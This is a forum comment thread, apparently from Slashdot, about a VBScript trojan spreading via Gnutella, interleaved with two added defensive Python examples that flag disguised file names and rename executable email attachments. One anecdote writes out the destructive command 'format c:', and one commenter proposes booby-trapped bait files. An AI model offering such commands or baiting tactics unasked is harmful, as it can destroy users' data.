    Back when I read alt.comp.virus regularly, it was understood that VBA stood for virus builder's assistant.

    People keep accusing Microsoft of making low quality products, but VBA was a major improvement from NuKe's Virus Creation Labs.

  89. Re:Virus to set security settings to paranoid? by jbarnett · · Score: 2


    If someone does make one, I vote for the name "IHATEYOU". Just remove "Windows scripting host" and associate the .vbs extension with let's say notepad.exe...

    But then again, you are still accessing someone's computer and changing someone else's data without their permission. Which even if your heart is in the right place, still might get you in trouble with someone.

    Plus what would happen if your script had a bug in it? Also should companies be allowed to "worm hole" hot-fixes into your computer without your permission? When the new service pack 6 screwed up some Lotus mail program, do you think IT managers would be happy that Microsoft automatically "fixed them" without permission?

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  90. Re:More interesting... by wtpooh · · Score: 2

    I actually came across an example of this just now. I was searching for some live recordings from a San Francisco radio station called KFOG, and found a file called " kfog.html" (yes, with the space out front). If you open it, it redirects you to a web page, which then sends you to a porn site (well, it would have sent me to a porn site except that the person mistyped their own IP address in the file :) ).

  91. Re:...but remember, Gnutella isn't actually weak.. by sandler · · Score: 1

    In unix, you'd do "file foo". If it says "MP3," that's good. If it says "ASCII virus text," that's bad.

    Is there some equivalent in Windows, or does everything go by file extension?
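The `file`-style check asked about above, sketched as an added example (not code from the thread): it classifies a download by its leading bytes and flags the naming tricks mentioned elsewhere in this discussion, namely a script extension behind a media-looking name and a name padded with whitespace. The extension lists, byte signatures and sample contents are assumptions constructed for illustration.

```python
import os

# Assumed lists for illustration; extend them to match local policy.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
               ".bat", ".cmd", ".exe", ".com", ".scr", ".pif"}
MEDIA_EXTS = {".mp3": "mp3", ".jpg": "jpeg", ".jpeg": "jpeg",
              ".gif": "gif", ".mov": "quicktime"}

# Constructed, harmless sample contents.
VBS_SAMPLE = b'MsgBox "constructed sample"\r\n'
MP3_SAMPLE = b"ID3\x03\x00\x00\x00\x00\x00\x0a" + b"\x00" * 10
EXE_SAMPLE = b"MZ\x90\x00" + b"\x00" * 60
HTML_SAMPLE = b"<html><body>constructed</body></html>"


def sniff(data):
    """Classify content by its leading bytes, ignoring the file name."""
    if data[:2] == b"MZ":
        return "dos/windows-executable"
    if data[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    # ID3 tag, or an MPEG audio frame sync (11 set bits).
    if data[:3] == b"ID3" or (
            len(data) > 1 and data[0] == 0xFF and data[1] & 0xE0 == 0xE0):
        return "mp3"
    if data[4:8] in (b"ftyp", b"moov", b"mdat"):
        return "quicktime"
    if data and all(b in b"\t\r\n" or 32 <= b < 127 for b in data[:512]):
        return "text"
    return "unknown"


def displayed_name(filename):
    """Name as listed when the file manager hides the final known extension."""
    stem, ext = os.path.splitext(filename)
    known = SCRIPT_EXTS | set(MEDIA_EXTS)
    return stem if ext.lower() in known else filename


def assess(filename, data):
    """Return a list of reasons to distrust a downloaded file (empty if none)."""
    findings = []
    stem, ext = os.path.splitext(filename)
    ext = ext.lower()
    inner_ext = os.path.splitext(stem)[1].lower()
    kind = sniff(data)
    if filename != filename.strip():
        findings.append("name padded with whitespace")
    if ext in SCRIPT_EXTS:
        findings.append("executable extension " + ext)
        if inner_ext and inner_ext not in SCRIPT_EXTS:
            findings.append(
                "double extension, displays as " + repr(displayed_name(filename)))
    if ext in MEDIA_EXTS and kind != MEDIA_EXTS[ext]:
        findings.append("claims %s but content is %s" % (MEDIA_EXTS[ext], kind))
    return findings


if __name__ == "__main__":
    samples = [
        ("PAMELA ANDERSON.MOV.vbs", VBS_SAMPLE),
        (" kfog.html", HTML_SAMPLE),
        ("live_set.mp3", MP3_SAMPLE),
        ("live_set.mp3", VBS_SAMPLE),
        ("photo.jpg", EXE_SAMPLE),
    ]
    for name, data in samples:
        print(repr(name), "->", assess(name, data) or "no findings")
```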

  92. Re:GNUtella only runs on *BSD, not Linux by C.Lee · · Score: 1

    >err...the Linux port hasn't been finished yet. BSD, on the other hand,
    >*does* have a port, and it *does* have security issues, especially

    Wrong. BSD's are no more affected by VBS scripts than Linux is. Also there are a number of Gnutella clones already out that are better than Gnutella. I don't use Gnutella at all, but rather gnut, a cli version of Gnutella.

  93. Re:Name a file "Metallica" by BlueUnderwear · · Score: 2

    Yeah, a great way to get back at them sharkz: lay out boobytrapped Metallica filez: they'll catch the flu, and hopefully learn the lesson that it's better to leave us geeks alone.

    --
    Say no to software patents.
  94. Re:Gnutella is closed source, hence not secure by C.Lee · · Score: 1

    >You can download the source for several of the clones right now. FURI
    >is probably the best client out there right now, and it's written in
    >java and can be run pretty much anywhere.

    Crap. Gnut is actually better because it's written in C and thus is better because you don't need JAVA to run it. Get a clue.

  95. Re:Virus hackers becoming Microsoft'ed? by Godfree^ · · Score: 1

    When was the last time you used a floppy disk, let alone left one in the drive at boot up (if you reboot)?

    "Legacy" virus' are out of date. The replication systems used wouldn't be as efficient in today's connection world. Maybe a file virus could work, but, that would involve sending other people your executables, and that doesn't happen much.

    Virus' authors are like marketing people. They aim their products at the masses. And today, the masses use the 'Net for distribution.

    --
    - Damnit, I'm dead Jim
  96. malicious no, a moron,.. by ebbv · · Score: 1


    yes. this is just stupid. it's a security hole only in the user's knowledge. any even remotely intelligent person would know what a .vbs file is, etc. etc. etc.

    the moron doesn't deserve kudos, he deserves a swift kick in the pants for being a dork. this is a childish thing to do, it serves no purpose, despite your silly claims.
    ...dave

    --

    Think different? I'd be happy if most people would just think...
    1. Re:malicious no, a moron,.. by Ambassador+Kosh · · Score: 1

      That is a slogan; it is not teaching users to think. Most of the ads I see for imacs portray them as being idiot proof boxes. I had a user call up after she bought an ibook. She knew nothing about macs but bought the computer because it matched her dress! She didn't want to read any instructions. She saw the ads and they said the computer was idiot proof. That is also what they told her in the store.

      She didn't want to think. She told me she did not want to think. She just wanted her problem fixed which she caused and didn't want to be told how not to do it again. She told me it is my job to fix it every time she breaks it. Of course that is wrong but that is a separate issue.

      --
      Computer modeling for biotech drug manufacturing is HARD! :)
    2. Re:malicious no, a moron,.. by Frodo · · Score: 1

      That's one more proof - you can not educate your users. If you could, the world would be such a nice place, but you can't. You should make tools that protect them from themselves, just like you hide dangerous liquids and matches from kids. If you use wrong tools or let them do, you accept your doom. Instead of sending next virus-alike to your grands, send letter to their mail client maker and ask them to remove "double-click" thing. Do this repeatedly until they get a clue or use other product.

      --
      -- Si hoc legere scis nimium eruditionis habes.
    3. Re:malicious no, a moron,.. by Robert+S+Gormley · · Score: 2
      Metal is perfectly okay in most commercial microwaves. Not even a spark. Design feature.

      I was going to be a pedant and say that water didn't explode, but sense got the better of me and I found a definition of explode saying 'to burst forth with sudden violence or noise from internal energy.'

      --

      Open Source. Closed Minds. We are Slashdot.

    4. Re:malicious no, a moron,.. by Ambassador+Kosh · · Score: 1

      You forget on windows by default it hides known file extensions. So the file is not something.vbs it is just something.

      The other problem is you, I and many others may know vbs files are dangerous but most regular users do not. Even after all the information with the ILOVEYOU problem people still clicked on vbs files at the university here no matter how many times they were told not to. That is why we now mangle file names of executable content when they are received here. That makes the person rename the file to execute it and to get that info they have to read the instructions. These steps have radically cut down on the problems we have with this type of content.

      Look around you. You can't rely on human intelligence because most people choose not to think. Most computer problems are very simple but users don't want to think. I have had to explain to the same person 20 times that when the computer says "Press enter to continue" that means press the enter button. That is not a hard concept but it requires at least reading skills and this person was working on her PhD in some humanities field. People are capable of thinking but they have bought into the Apple and Microsoft hype that computers don't require thought so they refuse to think.

      --
      Computer modeling for biotech drug manufacturing is HARD! :)
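One way a mail gateway could do the filename mangling described in the comment above, as an added example rather than that university's actual setup. The `.blocked` suffix, the extension list and the sample message are assumptions constructed for illustration.

```python
import email
from email import policy
from email.message import EmailMessage

# Assumed list of extensions that run on double-click under Windows.
EXECUTABLE_EXTS = (".vbs", ".vbe", ".js", ".wsf", ".bat", ".cmd",
                   ".exe", ".com", ".scr", ".pif")
# Assumed renaming scheme; the thread does not say which one was used.
SUFFIX = ".blocked"


def mangle_executables(raw_bytes):
    """Rename executable attachments so a double-click no longer runs them.

    Returns (rewritten message bytes, list of (old name, new name)).
    The attachment body is left untouched; only its headers change.
    """
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    renamed = []
    for part in msg.iter_attachments():
        name = part.get_filename()
        if not name or not name.strip().lower().endswith(EXECUTABLE_EXTS):
            continue
        safe = name.strip() + SUFFIX
        # Replace the advertised file name.
        del part["Content-Disposition"]
        part.add_header("Content-Disposition", "attachment", filename=safe)
        # Drop any declared script type (and any name= parameter with it)
        # so the client treats the part as opaque data.
        del part["Content-Type"]
        part["Content-Type"] = "application/octet-stream"
        renamed.append((name, safe))
    return msg.as_bytes(), renamed


def attachment_names(raw_bytes):
    """List attachment file names as a receiving client would see them."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    return [part.get_filename() for part in msg.iter_attachments()]


def build_sample():
    """Constructed message: one script attachment, one harmless text file."""
    msg = EmailMessage()
    msg["From"] = "sender@example.org"
    msg["To"] = "user@example.edu"
    msg["Subject"] = "constructed test message"
    msg.set_content("See attached.")
    msg.add_attachment(b'MsgBox "constructed sample"\r\n',
                       maintype="application", subtype="octet-stream",
                       filename="holiday photos.jpg.vbs")
    msg.add_attachment("2 eggs, 1 cup flour\n", filename="recipe.txt")
    return msg.as_bytes()


if __name__ == "__main__":
    rewritten, changes = mangle_executables(build_sample())
    for old, new in changes:
        print("renamed %r -> %r" % (old, new))
    print(attachment_names(rewritten))
```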
    5. Re:malicious no, a moron,.. by jbarnett · · Score: 5


      I just tested this, I emailed my grandparents and told them to NEVER execute an attachment. I told them it was probably a worm or virus, went into the whole anti-virus/windows propaganda and told them not to even click on executables from people they know and exchange email with regularly and even trust. They understood it pretty well.

      I wrote a quick, "Hello World" command line program in C, emailed it to them, and guess what, they ran it. I just told them 5 minutes ago that it would probably be a virus, did they question it? No, they ran it blindly.

      It just printed the string "some one just told you not to double click on executables, if I virus or worm, you would have to restore from backup, do you even have a backup. Glad I like your mug"

      They emailed me back saying "opps". I think they better understand now, the real test is when I email them here in a couple weeks and see if they remember then.

      They aren't computer savvy, they chat with old army buddies via email and view cooking guides on the web, they are "normal users" and don't really have a concept of virii or malice users, even when it is clearly explained to them. Sure they understand it, but do they practice it?

      I am going to wait a couple weeks then email the same program from an unknown (at least to them) hotmail or yahoo email account and see if it "stuck" with them

      --

      "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
    6. Re:malicious no, a moron,.. by pallex · · Score: 1

      It's simply not possible to press just one single button on a vcr, microwave, radio, games console, mobile phone etc and screw up everything to the point of having to spend 3 hours undoing it (or having to take it back to the shop). Is the fact that you can make this happen on a pc a fault in the user, or the pc?
      Perhaps there should be a `user` mode of some sort that just *doesn't* let you f**k things up, no matter how inconvenient.
      Perhaps ignorance isn't bliss, anymore?

      a.

  97. GNUtella only runs on *BSD, not Linux by Anonymous Coward · · Score: 1

    err...the Linux port hasn't been finished yet. BSD, on the other hand, *does* have a port, and it *does* have security issues, especially with VBS files being run automatically (!)

    I think the problem with porting is the glitches in BSD's POSIX-compliance libraries which had to be worked around in the code. Now that they're getting it to work with Linux, they have to re-write to be compatible with the real POSIX standard (ie, Linux kernel services), rather than the broken BSD implementation.

    1. Re:GNUtella only runs on *BSD, not Linux by JEDi_ERiAN · · Score: 1

      gtk_gnutella is a working port of gnutella for linux. search for it on freshmeat.



      --

      -
      This Post has been brought to you by the letter "E".
    2. Re:GNUtella only runs on *BSD, not Linux by .pentai. · · Score: 1

      How does the BSD port run a microsoft Visual Basic file - or better yet, WHY? Perhaps you were referencing the windows version as being buggy with VBS...but last I checked VB wasn't ported to *BSD.

    3. Re:GNUtella only runs on *BSD, not Linux by Biff+Cool · · Score: 1
      So it automatically runs scripts if you download them? That's one of the worst ideas I can think of.

      --

      Conscience is the inner voice which warns us that someone may be looking.
      -- H. L. Mencken

    4. Re:GNUtella only runs on *BSD, not Linux by Andy+Dodd · · Score: 2

      If you read the Evolution thread, they're adding VBS capability, but unlike Windows, they're keeping it in a sandbox with restrictions.

      --
      retrorocket.o not found, launch anyway?
    5. Re:GNUtella only runs on *BSD, not Linux by SirGeek · · Score: 1
      I talked with Theo DeRaadt about this on the BSDCON mailing list a few months ago, and he essentially told me to go to hell when I suggested that this "feature" be disabled. Apparently the *BSD folks think that point-and-drool convenience takes precedence over security, even when very little convenience is achieved.

      Theo DeRaadt != BSD.. He is OpenBSD and he tends to be a bit on the rude side. I would send an email to the physical developers of the proggy (and to the development list) and explain your concerns and make your suggestion.

      Now that they're getting it to work with Linux, they have to re-write to be compatible with the real POSIX standard ..

      This isn't ONLY a BSD to Linux problem. It can be a Linux to ANYTHING problem too. I have had more nightmares converting stuff that uses /proc "files" instead of system commands (or by using some sort of wrapper around the system calls and /proc to make it portable)

  98. Re:VBS file extensions by rifter · · Score: 1

    Problem is windows hides that extension by default.

  99. Linux enters the mainstream? by GrayMouser_the_MCSE · · Score: 1

    Well, finally a publicly known virus that can attack linux users. Of course, this virus isn't automatically given root access to the system. Oh, and this virus can't automatically replicate itself to hundreds of your friends. Hmmm... this virus can't even go into your system and change files that you don't have rights to. I guess Linux still has a long way to go before it catches up to Microsoft.

    --
    Of course I use Microsoft. Setting up a stable unix network is no challenge ;p
    1. Re:Linux enters the mainstream? by Anonymous Coward · · Score: 1

      Huh? This virus can't attack linux users. It is a vb script file, and can only be executed on a windows box.

    2. Re:Linux enters the mainstream? by GrayMouser_the_MCSE · · Score: 1

      I'm sorry for the lack of technical accuracy in the post. I was trying to add a dose of humor to my (and hopefully your) perhaps otherwise dull day.

      --
      Of course I use Microsoft. Setting up a stable unix network is no challenge ;p
    3. Re:Linux enters the mainstream? by Bazman · · Score: 1

      Hehe. Of course you could always rewrite this vbs file as a shell script. The trick is getting people to run it. With Windows it's there in the folder, looks executable, you double click it. Bang bang bye bye hard disk.

      But with the increasing use of desktop file managers like that with Gnome and KDE, you could run a shell script virus downloaded from Gnutella just as easily. All it would take is for your umask, or your application, to be set to add execute permissions to files.

      Could even be a trojan, a gzexe-compressed shell script that seemingly does something else. Be vigilant - linux viruses/worms are coming!

      Baz

    4. Re:Linux enters the mainstream? by Legolas-Greenleaf · · Score: 1
      This has got to be one of the longest flame threads I have ever seen. People really should understand what's going on before posting such emotion causing statements (especially something antiLinux on /. without due cause) ;^)

      If somebody could point me somewheres where i can actually find out some information about VBS and what it's good for (since, of course, all i've been hearing about is all these trojans), it could be most useful. As of now, I haven't seen any possible use for any Microsoft program (but especially Outlook) to have this functionality, or even auto-view it. (in some cases)
      -legolas

      i've looked at love from both sides now. from win and lose, and still somehow...

  100. Re:clearing things up by jbarnett · · Score: 2


    I know this, that is why I said for the runtime interputer, ok so it is spelled wrong, but you should still be able get the point of the post with a couple characters misplaced.

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  101. Re:clearing things up by iCEBaLM · · Score: 2

    which I am not claiming it is right, but when I first heard GNUtella, I thought it was a Unix program from the Free Software Foundations...

    What does the "tella" stand for anyways?


    Nutella is a chocolate spread that comes in a jar, akin to peanut butter. It's quite rich chocolate, very sweet.

    GNU + Nutella = GNUtella

    -- iCEBaLM

  102. Re:VBScript isn't evil by Jason+Levine · · Score: 1

    I've used VBScript to automate a lot of tasks that would have been very repetitive to do otherwise. What MS needs to do, however, is beef up the security on the Windows Scripting Host (which VBS files run through) so virus-like behavior gets flagged and the user is warned. (Of course, not one to wait for MS to act, I wrote a prog that'll do this... http://www.winmag.com/fixes/watchdog/ if anyone's interested.) Once a buffer is in place, the rate at which VBS-type viruses can spread will diminish a lot. For example, many users might open a PAMELA ANDERSON.MOV.vbs file, ignoring the vbs extension and getting infected. But how many will proceed if opening the "movie" file returns a warning that this will change your registry, overwrite files, etc.

    --
    My sci-fi novel, Ghost Thief, is now available from Amazon.com.
  103. Re:Gnutella is closed source, hence not secure by mgt · · Score: 1

    Hehe isn't that just lovely... but in these cases with the gnutella issue and the loveletter virus it hasn't been activated automatically. You had to open the email and then doubleclick the attachment. And with the gnutella version you had to download it somewhere on your disk and then try to execute it. Hmm if I write a VBS and put it on a web-page and call it funny.txt.vbs and people download it (hehe why read it in Netscape =) ) doesn't that make it a WEB-WORM ? ... oh my god the whole WWW is going to be infected...

  104. Not a worm! by Signal+11 · · Score: 5
    A worm propagates automatically without user intervention - like the Great Internet Worm.. or, more recently, remote explorer. This is a trojan horse. Get your definitions right, ZDNet.

    Second, be very grateful the author was nice enough to make this a benign bug.. it could have had CIH as its payload.

    1. Re:Not a worm! by kaphka · · Score: 2

      This is flamebait, I know, but it has to be said: I find it interesting (and disappointing) that everyone here is so anxious to point out that this is not a worm (which is correct), yet most people had no problem with calling the ILOVEYOU trojan a worm, even though it used the exact same mechanism to propagate. (I.e. convincing stupid users to run it.)

      --

      MSK

  105. Fortunately, open source gnutella can adapt. by Jason+H.+Smith · · Score: 1

    You make a good point; however, Gnutella's open nature will be a positive factor. For instance, I can think of a few ways to help to combat this problem off the top of my head. Soon, I believe, Gnutella will offer the freedom to effortlessly exchange any file, and the smarts to evade spam.

  106. -pedantic by Imperator · · Score: 2

    If I were a naughty boy, I would use scripting to get name, email, or whatever file I want.

    --

    Gates' Law: Every 18 months, the speed of software halves.
    1. Re:-pedantic by talks_to_birds · · Score: 1
      Whoa!

      Grammar!

      What a concept!

      t_t_b
      --

      --
      I'm on PJ's "enemies" list! Are you?
  107. Some details about the worm. by pen · · Score: 2
    Before you go screaming and shouting, here are some facts I found after analyzing the script:
    • The "worm" only works if Gnutella is installed in the default directory, "C:\Program Files\Gnutella\". Since Gnutella doesn't use the registry or any other system-wide config files, it is fairly hard to pin down where it is installed. (One way, of course, would be to look at the Start Menu shortcuts, but those are optional as well. Maybe in version 1.2. <g>)
    • The user must search for the files with the particular names, download the file, and then execute it. The "worm" does not self-propagate. In fact, I'm not sure if it is even a worm. It seems more like a trojan to me. I think that the reports are automatically labeling anything written in VBScript as a worm.
    • Obviously, it rarely has an effect on any of the clones, since they don't use the same config file structure, and they usually aren't found in "C:\Program Files\Gnutella\".
    There we go, that should reduce the hype a little bit... or maybe not.

    --

    1. Re:Some details about the worm. by talks_to_birds · · Score: 1
      "C:\Program Files\Gnutella\"

      Sounds to me like another problem only the Windows folks have to worry about..

      t_t_b
      --

      --
      I'm on PJ's "enemies" list! Are you?
  108. Re:This is proof that Linux is not immune by beaverthecleaver · · Score: 2

    If you check it there is no official gnutella for linux just clones and linux doesn't deal with vbs or ini files. Get it right before you decide to rip on something you don't know about. Beave

    --
    The Beaver The Best Things In Life Are Free And So Is Linux!
  109. But what about popup box trojans by rana · · Score: 1

    There's a reason why popup boxes for administrator access are unpopular: It's too easy to make a mock popup box in order to snarf passwords. That's one reason (the only reason?) why you have to three-finger-salute in order to log in to NT, it's a bit harder for the trojan to grab the sysreq that's generated by Ctrl-Alt-Del.

    IMO, the NT style login-via-sysreq would be a good feature to add to Linux. It wouldn't be too difficult to do. It's probably already in place in the more secure Linux distro's, but I haven't checked them out, since I'm not that paranoid about my co-workers putting trojan password sniffers on my box.

    1. Re:But what about popup box trojans by DavidTC · · Score: 1

      You mean Alt-Sysreq-K, which disconnects all programs from the console and logs you out?

      -David T. C.

      --
      If corporations are people, aren't stockholders guilty of slavery?
  110. Re:hrm by evand · · Score: 1

    Why would I do a stupid thing like that? Give me *some* credit, will you?

    OK, OK! ::backs off and smiles:: I really don't know you personally, have never met you, etc. It wasn't clear from your post what you were asking.

    I just thought there was something special about IRC clients, like maybe letting many people on IRC know my IP address when I run as root or something.

    The only thing I can think of is that if there were some kind of exploit in your IRC client that allowed file access/program execution as the user running the client, running as root would present a major security problem.

  111. ...but remember, Gnutella isn't actually weak... by webword · · Score: 5

    And I quote, from the Gnutella home page:

    "Some reports have been circulating in some of the online press about a 'Gnutella Worm'. This 'worm' does not exploit any weaknesses in gnutella itself, but rather weaknesses in the Windows operating system and more importantly, the user. This 'worm' will not affect anyone who doesn't manually download it, and subsequently manually run it. Gnutella does not execute any files it downloads. Be smart, don't run anything from an untrusted source without checking it first. This is an exploit of human gullibility and a weak operating system, nothing more."

    Gnutella powerful, humans weak. Grunt, grunt.

    John S. Rhodes
    WebWord.com (Usability Vortal)

  112. Re:Reminds me of this UNIX "virus" I recieved once by C.Lee · · Score: 1

    >This could have been easily done in Perl or any other script language
    >as well so Linux isn't really immune to it (only nobody has never done
    >it before).

    Yo! Tell us all just how this could have been easily done in Perl when the Linux Gnutella clones don't and most likely never will execute/run downloaded scripts?

  113. Re:...but remember, Gnutella isn't actually weak.. by Phil+Wilkins · · Score: 1

    Simple, only pirate^H^H^H^H^H^Hshare data files. Pretty hard to hide a trojan inside an mp3 / mpg, although I'm sure wma's probably got some way of running embedded code...;)

    You run an unknown executable on a non-essential connected system, you deserve what you get.

    You run unknown scripts without reading them first, ditto...

    Maaan, these things say VBS in the filename, not mp3, or mpg, I mean, some people are just asking for it.

    But I forget, this is the land where you can sue McDonalds for giving you what you ask for, namely, a HOT cup of coffee.

  114. Re:...but remember, Gnutella isn't actually weak.. by Stardate · · Score: 1

    Any VBS file is NOT a binary file, it is a script, a text file which must have a .VBS extension to be executable (at least on a double-click). An anti-virus program running in the background can automatically check binary files for virus signatures.

    --
    "... I declare our city to be a free and independent state to be named Tri-Insula!" --Fernando Wood, Mayor of NYC 1861
  115. How to look like a fool! by Ratface · · Score: 2

    I do like the ironic sense of humour that the "victim" file has. The fact that one can use the features of Gnutella to go and see how many people have been infected by the worm is pretty original. However, as worms go, this doesn't seem to have been particularly effective at replicating itself.



    "Give the anarchist a cigarette"

    --

    A little planning goes a long way...
  116. HNN has some information on this by QBasic_Dude · · Score: 1
    HNN:
    A worm with minimal malicious activity is infecting Gnutella users at an alarming rate. Gnutella is similar to Napster in that it allows peer to peer filesharing. The worm, which has as many as twenty file names, contains a message from the author "if I was a naughty boy, I could use scripting to get name, email, whatever files." Users are cautioned to be wary of files within Gnutella that have .vbs extensions.


  117. Name a file "Metallica" by BoLean · · Score: 2

    Then it'll get downloaded tons. I wonder if this is how Napster users were snagged?

  118. Re:Microsoft to blame? by finkployd · · Score: 2

    yours is based more on the generic Slashdot "Microsoft sucks, Linux rules" viewpoint.

    Really? please re-read my post and find either the words microsoft or linux. For that matter find a reference to ANYTHING vendor specific except VB. I was not attacking the language, only saying that this virus is not a gnutella specific virus, it is a visual basic virus. Sure it could be written in a bash script but then it would be a bash virus. All I was doing was classifying it.

    It seems there are two kinds of extremes on slashdot. Those who claim Linux is the end all of computer and that microsoft sucks, and those who never fail to attack anyone and everyone of harboring that viewpoint. I believe in your zest to paint me in that light, you failed to actually read my post and just assumed I was trolling the "slashdot party line" as it were.

    Finkployd

  119. Really Clever by LaNMaN2000 · · Score: 3

    This is a really clever infection mechanism but it is hardly the worst problem facing Gnutella. Many servers simply house large numbers of files (with appropriate names) that redirect users to the owner's porn site or place a desktop link to said porn site. Many novice users will not think to check the file size and will end up with just porn advertising instead of what they were looking for.

    I think this low signal/noise ratio is what is going to hurt Gnutella. Napster avoids this problem by only allowing MP3 files. If it is a worthless file, it will only open in an MP3 player and be found to be an invalid file. On Gnutella, the user could execute a file in the appropriate program--making novices all the more vulnerable to viruses and advertising.

    --

    ByteMyCode.com: A Web 2.0 code sharing community.
    1. Re:Really Clever by Phil+Wilkins · · Score: 1

      One of these days, people will learn to check the extension. If it's html, or vbs, or indeed, anything other than the type you're looking for (for pR0n try jpg, gif, mov, mpg), don't download it, it's almost certainly not what you want.

      Fool me once, shame on you, fool me twice, shame on me, fool me thrice, nuke my system, mail my pR0n collection to my parents, boss, and the FBI, and I'm a complete moron who deserves everything I get.

    2. Re:Really Clever by dolanh · · Score: 1

      In theory you can filter files in Gnutella as well (at least by file extension). The problem is, most users will never get that far...

  120. whats in a name? by Yarn · · Score: 1

    Adding GNU to the beginning doesn't mean it's made by the FSF. eg: gnuplot.

    I could make a program to manage gnu breeding, and call it gnusex, doesn't mean it runs on linux, has open source, or was made by RMS.

    TrollMark: 1/10

    --
    -Yarn - Rio Karma: Excellent
  121. Re:...but remember, Gnutella isn't actually weak.. by Mija+Cat · · Score: 1

    Windows, like DOS before it (and CP/M before that) uses the extension to determine file type.
    Pretty sad, really.

    --
    Yes, that's really my e-mail. Don't change a thing.
  122. clearing things up by matticus · · Score: 2

    get your definitions right, people-this "worm" does not attack linux users. linux is immune to it. why? have you ever *tried* to run a vbScript in linux? it is not supported at all. plus, there isn't even an official linux gnutella client. i guess when people see GNUtella, they think linux. but it doesn't affect linux at all. now no more people can say "well, linux finally has a virus, ha ha ha!" because this doesn't have anything to do with linux.

  123. Now is the time? by genki · · Score: 1

    Is it just me or is lately the time for worms? Between this (and all the other VBS worms), and the /. worm going around...

    ---------------------------------

    --

    ---------------------------------
    Visit
    1. Re:Now is the time? by nezroy · · Score: 1

      It does make you wonder as to the flatness of the learning curve for the human species... how hard is it NOT to double-click on something you weren't expecting from someone, with weird extensions you've never seen before, and has an always tacky filename? Save yourselves, people! Think once!

  124. this is getting really old by eastMike · · Score: 1

    whoop-de-doo...another vbs worm being sent around. wow, this is really something new. First of all, nobody is impressed by this kind of thing. second of all, it is not original or amusing. So why must people keep making these stupid worms?

    --

    Time is fun when you're having flies.
    -Kermit the Frog
    1. Re:this is getting really old by kurowski · · Score: 1

      The question is not "why must people keep making these stupid worms" but "who cares" and "why does slashdot insist on publishing stories about them"?

      Do we really care? Even the slashdot-reading Windows users probably don't care!

      Hint- if you use Windows AND Gnutella AND you download and run arbitrary Visual Basic scripts, then you probably don't understand most of what slashdot reports on (well...). Hey kid, here's a nickel. Go buy yourself a real OS.

  125. Remember At Ease? by Grahf666 · · Score: 1

    There used to be a program for the older versions of Mac OS called At Ease, which basically made it very hard to do anything bad to the computer (ie you couldn't change any settings, etc.) I'm not sure what it did in the way of actual security from outside threats... Granted, Mac OS users look at all the carnage being wrought in Windows-land by virii/trojans/worms and laugh, because it doesn't affect them one bit. There are very few Mac viruses. Perhaps Bill and his friends over at Microsoft should look into making some kind of added-security shell to Windows to put onto your average school or office PC, to prevent people from doing idiotic things. Or at least add a few extra warning labels, and make it so you can't just press return to confirm. "Do you want to run this suspicious-looking .vbs file?" "Are you sure you want to run this suspicious-looking file? Microsoft Corporation does not insure that this file will not harm your computer?" etc, etc...

    1. Re:Remember At Ease? by jbarnett · · Score: 2


      rexplorer.exe

      instead of rsh :)

      --

      "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  126. Re:asm by GoRK · · Score: 2

    In fact I hate to have to admit it but NT's permission scheme for files is far far more robust than your everyday UN*X.

  127. Kill the VBS.. by technos · · Score: 2

    I'm sorry, but this is just one more example of how [l]users make viruses possible. A Visual Basic script virus that needs to be actively run? Sheesh, I'd run it through a scanner and have a look at it before I ran it; Most sane people would! Even if they didn't know what they were looking for, I'm sure they'd recognise evil intent!

    But all you hear is "nasty virus writers" from the mass-media, when it's stupid, stupid users to blame.. Reminds me of a lawsuit that started in a local BBS message board back in '87. Someone posted, in jest, that format c: would fix a particular problem. Two lusers tried it, formatted their drives, and promptly retained lawyers because they thought they could sue someone else for their own stupidity. Judge tossed it out, thank God.

    --
    .sig: Now legally binding!
    1. Re:Kill the VBS.. by JakeS · · Score: 1

      It's not really a virus, it's just a script (like plenty of shell scripts), that runs writes to an ini file (like echo newstuff > gnutella.ini) and copies its files to the upload directory for gnutella (like cp thisfile /home/gnutella/share/).

      A scanner would have done very little good here. And vbs isn't really to blame either. It's just a matter of fooling users into running something they ought not to.

  128. Linux IS immune to this worm by knuth · · Score: 1

    An AC says that this incident proves that Linux is not immune, that this is a wakeup call blah blah blah.

    Linux is immune to this Gnutella worm. Wanna know why? If you had read the Trend Micro alert linked from the article, you would see that if executed, the file looks for C:\PROGRAM FILES\GNUTELLA. Got that on your Linux box? I think not. Even if you dual-boot, there would be no way to infect Linux while in the Windows partition or vice versa. As an extra bonus, the technical details page says that the affected OS is Windows 98. And it modifies the GNUTELLA.INI file. Got one of those on your Linux box? Again, I think not.

    And it spreads by people executing downloaded copies with file extension .vbs. If you were in Linux, you'd see the extension. What with other recent outbreaks, you'd be a fool to run an unknown, unchecked VBS file in Windows.

  129. So what are you waiting for? by Anonymous Coward · · Score: 1

    "If Linux was just as popular with stupid users as Windows is, something similar could happen with Perl scripts."

    There are plenty of stupid Linux users, and I'm sure that many of them use Gnutella - what are you waiting for?

    If it's possible, then do it.

    Is it the fact that Linux won't run something that's not flagged as executable? (Doesn't matter what you name the file, if the X bit isn't set, it won't run.)

    THIS IS A WINDOWS PROBLEM. Yes, a smart user won't get hit by it, but that doesn't provide any proof that it's a 'stupid user' issue. Show me ANY Linux app that automatically sends a non-executable file with a ".pl" extension to the Perl interpreter when you click on it.. Does X do it? NO. Do any window managers do it? NO. Do any desktop managers do it? NO!

    This is what Windows is doing - you click on something with the '.VBS' extension, and it gets sent to the VBS interpreter - there is something fundamentally wrong with this, and this fundamental problem is part of the OS.

  130. Re:hrm by extrasolar · · Score: 2

    My comment was intended to be neutral.

    No offense meant or taken.

  131. Evolution by fishexe · · Score: 1

    It's reached the stage where the sum of the computing power of the world has become so complex that bugs and other random events evolve into malicious virii roughly 1/10000000 times and these virii then evolve upon encountering more bugs and random slip-ups and so it progresses.

    Pretty soon we'll have fully sentient a-life floating around online. In the form of email worms reading "I love you!".

    Ever get the impression that your life would make a good sitcom?
    Ever follow this to its logical conclusion: that your life is a sitcom?

    --
    "I don't care about the Constitution!" --Bill O'Reilly, November 17, 2009
  132. The Worm is a HOAX! by Sune+DK · · Score: 1

    Proof:
    Open your Gnutella client.
    Search for 'GWV'.
    ALL the files have the same ID:
    "Generation #: 13
